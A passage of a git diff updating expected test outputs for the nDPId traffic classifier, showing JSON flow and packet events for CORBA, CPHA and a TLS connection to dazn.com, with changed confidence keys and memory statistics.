{"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020792,"flow_last_seen":1614768020792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020792,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614768020792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020792,"pkt":"5kBKB+riApXG95NLCABFAAAwnO8AAIAGAAAKZQACCmYAAiIXBBmwjThoAAAAAHACgAEU8QAAAgQFtAMDAQA="} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614768020793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020793,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOEAAH8GihgKZgACCmUAAgQZIhewjUFJsI04aXASgAHuQQAAAgQFtAMDAQA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614768020793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020793,"pkt":"5kBKB+riApXG95NLCABFAAAonPAAAIAGAAAKZQACCmYAAiIXBBmwjThpsI1BSlAQgAEU6QAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020794,"flow_last_seen":1614768020794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020794,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614768020794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020794,"pkt":"5kBKB+riApXG95NLCABFAAAwnPQAAIAGAAAKZQACCmYAAiIY7wewjV4NAAAAAHACgAEU8QAAAgQFtAMDAQA="} 
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020795,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOUAAH8GihQKZgACCmUAAu8HIhiwjWV0sI1eDnASgAG5gQAAAgQFtAMDAQA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020795,"pkt":"5kBKB+riApXG95NLCABFAAAonPUAAIAGAAAKZQACCmYAAiIY7wewjV4OsI1ldVAQgAEU6QAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 
-00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":22,"total-skipped-flows":0,"total-l4-payload-len":2397,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1614768020795} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 25/22 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878345 bytes -~~ total memory freed........: 5878345 bytes -~~ total allocations/frees...: 118147/118147 +~~ total memory allocated....: 6011979 bytes +~~ total memory freed........: 6011979 bytes +~~ total allocations/frees...: 120909/120909 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 675 chars 
diff --git a/test/results/cpha.pcap.out b/test/results/cpha.pcap.out index ab91f7900..4473a6473 100644 --- a/test/results/cpha.pcap.out +++ b/test/results/cpha.pcap.out 
@@ -2,8 +2,8 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1603354463286} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603354463286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":96,"pkt_l4_len":58,"thread_ts_msec":1603354463286,"pkt":"AQBeFQMBAAAAAAEBgQAAFQgARQAATgAAAAD\/EQyKAAAAAKwVAwAftB+0ADpJ\/BqQDDEnhQABABZ5PgAB\/\/7gSgEAAAIAAQAACAoAAgADAAQAAAIECQAAAAkAAAAAAAIA"} 
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}} 
+00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603354463286,"flow_last_seen":1603354463286,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1603354463286,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"172.21.3.0","src_port":8116,"dst_port":8116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CPHA","breed":"Fun","category":"Network"}} 00547{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"cpha.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":50,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1603354463286} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 663 chars diff --git a/test/results/dazn.pcapng.out b/test/results/dazn.pcapng.out index 415a46b4a..8dcf482fb 100644 --- a/test/results/dazn.pcapng.out 
+++ b/test/results/dazn.pcapng.out 
@@ -4,23 +4,23 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1653830614885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830614885,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8nR9AAEAGx+XAqAGANFTfOtMEAbuvwsZTAAAAAKAC+vBmfAAAAgQFtAQCCAqWAjADAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1653830614902,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830614902,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8gywAAPQGbdg0VN86wKgBgAG70wTy6KcPr8LGVKAS\/\/+ceQAAAgQFoAQCCAqKcaCKlgIwAwEDAwk="} 01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1653830614904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1653830614904,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5nSFAAEAGxebAqAGANFTfOtMEAbuvwsZU8uinEIAYAfZtkgAAAQEICpYCMBWKcaCKFgMBAgABAAH8AwPGAVMbGSAdqErCRl+JXjKyqMchnfEu2B1zRzOaxV8o1iAgIXSPqMjljdeZ3z7HJVcJsXiZNidVLUq9BDfRlvUd8wAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAARAA8AAAx3d3cuZGF6bi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgb4BCLF1x\/xJ6a5y\/t336Oc1aPROIMgrb5TqghyKk8UgAFwBBBJ9JHh6PsEBzfFNPwetkTywSgp2rvZxjUd7cfOXHBFgNjkLd+otPjvJdROVP19OEA+JHkFvE7miAvh9c39D0acUAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830614885,"flow_last_seen":1653830614904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830614904,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.dazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830614885,"flow_last_seen":1653830614920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830614920,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.dazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830614885,"flow_last_seen":1653830614904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830614904,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.dazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00923{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830614885,"flow_last_seen":1653830614920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830614920,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.dazn.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1653830640613,"flow_last_seen":1653830640613,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1653830640613,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1653830640613,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830640613,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA81ThAAEAGoV3AqAGADeL0G7PUAbsidLdlAAAAAKAC+vBeiAAAAgQFtAQCCArtba2JAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1653830640629,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1653830640629,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8HAYAAPQG5o8N4vQbwKgBgAG7s9RejoeqInS3ZqAS\/\/\/XoAAAAgQFoAQCCApxJyp57W2tiQEDAwk="} 
